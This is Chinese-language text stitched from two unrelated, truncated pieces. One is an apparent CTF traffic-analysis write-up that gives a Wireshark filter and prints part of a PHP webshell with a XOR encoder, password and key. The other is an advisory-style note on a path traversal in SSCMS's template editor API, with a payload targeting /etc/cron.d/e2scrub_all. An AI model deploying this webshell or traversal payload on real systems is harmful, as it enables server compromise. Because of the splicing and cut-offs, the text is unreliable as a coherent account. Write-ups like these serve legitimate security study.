流量分析flag1
题干找的上传是压缩包,筛选包内POST或PUT流量
http.request.method==POST||http.request.method==PUT
其中 No.13038 的key.png是 PK 头,但不是个加密的压缩包
13110是个简单的shell,导出如下
12345678910111213141516171819202122232425262728293031<?php@session_start();@set_time_limit(0);@error_reporting(0);function encode($D,$K){ for($i=0;$i<strlen($D);$i++) { $c = $K[$i+1&15]; $D[$i] = $D[$i]^$c; } return $D;}$pass='suger';$payloadName='payload';$key='a5717a6...
此处用户传入的 RelatedFileName 参数没有进行路径遍历字符的过滤或清洗,导致持有 /api/admin/cms/templates/templatesEditor/actions/settings 接口访问权限的用户,可以构造如 "relatedFileName":"/../../../../../../../../.././etc/cron.d/e2scrub_all" 进行传参,请求的中 relatedFileName 参数将会进入到如下位置。
cms/src/SSCMS.Web/Controllers/Admin/Cms/Templates/TemplatesEditorController.Settings.cs
在 TemplatesEditorController.Settings.cs 的 L100,含有路径穿越的内容的 RelatedFileName 的值又赋给了 template.RelatedFileName 中,然后 templ...